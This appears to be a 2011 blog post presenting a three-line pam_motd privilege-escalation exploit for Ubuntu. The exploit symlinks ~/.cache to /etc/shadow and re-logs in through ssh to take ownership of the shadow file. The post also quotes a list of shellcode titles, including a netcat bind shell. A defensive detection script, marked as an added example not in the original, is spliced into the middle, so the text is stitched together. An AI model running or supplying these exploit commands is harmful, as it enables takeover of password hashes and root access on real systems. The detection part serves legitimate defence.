Thursday, December 29, 2011

Ubuntu root access

The PAM_MOTD exploit for Ubuntu is still not patched…

rm -rf ~/.cache
ln -s /etc/shadow ~/.cache
ssh localhost   # trigger pam_motd by re-logging in and you'll own /etc/shadow
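
From the defender's side, the two things to look for are the precondition shown above (a ~/.cache that is a symlink rather than a directory) and the effect (a sensitive file no longer owned by root). The script below is an added example, not part of the original post; the function names, the /home layout and the sample tree are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: detect the symlinked ~/.cache precondition and its effect.
# Function names and the /home layout are assumptions, not from the post.

# Print one line per home directory under $1 whose .cache is a symlink.
scan_cache_symlinks() {
    for home in "$1"/*; do
        [ -d "$home" ] || continue
        if [ -L "$home/.cache" ]; then
            printf '%s/.cache -> %s\n' "$home" "$(readlink "$home/.cache")"
        fi
    done
}

# Print the numeric owner uid of file $1 (portable: parses `ls -ldn`).
owner_uid() {
    ls -ldn "$1" | awk '{print $3}'
}

# Succeed only if file $1 is owned by uid $2 (default 0, i.e. root).
owned_by() {
    [ "$(owner_uid "$1")" = "${2:-0}" ]
}

# Constructed sample tree: alice has a normal cache directory, bob's .cache
# is a symlink to a stand-in for a sensitive file. Prints the tree's path.
make_sample_tree() {
    t=$(mktemp -d) || return 1
    mkdir -p "$t/home/alice/.cache" "$t/home/bob"
    : > "$t/fake_shadow"
    ln -s "$t/fake_shadow" "$t/home/bob/.cache"
    echo "$t"
}

# Demo on the constructed tree; on a real host use: scan_cache_symlinks /home
tree=$(make_sample_tree)
scan_cache_symlinks "$tree/home"
owned_by "$tree/fake_shadow" "$(id -u)" && echo "owner unchanged: $tree/fake_shadow"
rm -rf "$tree"
```

On a real host, run scan_cache_symlinks /home and owned_by /etc/shadow as root; any output from the first or a failure of the second deserves investigation.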



In a recent thread it was suggested that Linux is as vulnerable as Windows, and as proof a list of exploits was given that were published on almost the same day as the discussion. Here is the list that was given:
Quote

2011-07-08 Ubuntu PAM MOTD File Tampering (Privilege Escalation)
2011-07-05 linux/x86 polymorphic Drop suid shell root /tmp/.hiddenshell 161 bytes
2011-07-05 linux/x86 bind sh@64533 97 bytes
2011-07-05 linux/x86 lynx polymorphic shellcode 84 bytes
2011-07-05 linux/x86 setreuid(0,0) execve("/bin/sh",NULL,NULL) encoded 62 bytes
2011-07-05 linux/x86 /proc/sys/kernel/randomize_va_space SUB encoded 111 bytes
2011-07-05 linux/x86 bind port to 6678 XOR encoded polymorphic shellcode 125 bytes
2011-07-05 linux/x86 nc -lp 31337 -e /bin/sh polymorphic shellcode 91 bytes

Cheers,

Ujjwal Soni
